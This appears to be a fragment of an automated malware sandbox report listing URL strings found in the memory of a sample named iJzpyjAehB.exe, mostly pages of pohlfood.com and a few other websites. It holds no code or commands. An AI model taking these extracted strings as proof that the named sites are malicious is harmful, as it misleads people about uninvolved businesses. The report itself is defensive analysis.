                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/catalog?view=class&#038;limit=200
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?offset=0&amp;limit=250&amp;col=class&amp;dir=ASC&amp;term
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizza
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=Mediterran
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=mexican
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://newweb.com-sit.com/wp-content/uploads/2018/10/section-3-2.jpg);background-repeat:no-repeat;b
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogp.me/ns#
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parts.com-sit.com/de
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parts.com-sit.com/zh-hans
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/cart/request-quote/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/about-300x298.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pcgrate.com/wp-content/uploads/woocommerce_uploads/logo-sdw6o6.gif
                      Source: iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#breadcrumb
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#primaryimage
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/#website
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/?s=
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/Flyers
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/about/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/comments/feed/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/contact/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/employment-opportunities/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/feed/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/flyers/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/news/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/order/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/our-team/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/privacy-policy/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/product-catalog/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/service-area/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/vendors/
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/LogoNEW-250x129.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P-48x48.gif
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/P.gif
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/facebook-512-q1jbn3nkxzlg1s7t64rdmt1lwqmyqc
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/elementor/thumbs/in-q1jbnt182ik6r96y1xqb04n1y55vi627ix9trmwf
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-1163123914b.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-516652802b.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/iStock-926365420b.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/monthlyspec.png
                      Source: iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-content/uploads/pohl-14.jpg
                      Source: iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pohlfood.com/wp-json/
